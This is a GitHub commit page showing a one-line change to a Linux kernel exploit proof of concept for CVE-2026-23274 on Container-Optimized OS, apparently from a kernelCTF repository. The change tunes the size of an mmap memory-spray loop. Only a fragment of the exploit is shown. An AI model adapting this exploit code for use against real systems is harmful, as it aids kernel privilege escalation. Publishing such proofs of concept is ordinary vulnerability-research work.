Skip to content

Commit 1630e6f

Browse files
nperm: fine tune for CI, using 0x9200
1 parent d00297b commit 1630e6f

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

  • pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2

pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit.c

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -363,7 +363,7 @@ void nperm(){
363363

364364
// For 3.5 GB mem
365365
pgvAdd(1,9,0x610);
366-
size_t to_allocate = 0x94000;
366+
size_t to_allocate = 0x92000;
367367
for(int i = 0 ; i < to_allocate; i+=1){
368368
char* addr = (char*)mmap(0,0x1000,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_PRIVATE,-1,0);
369369
if( (long ) addr == -1 )

0 commit comments

Comments
 (0)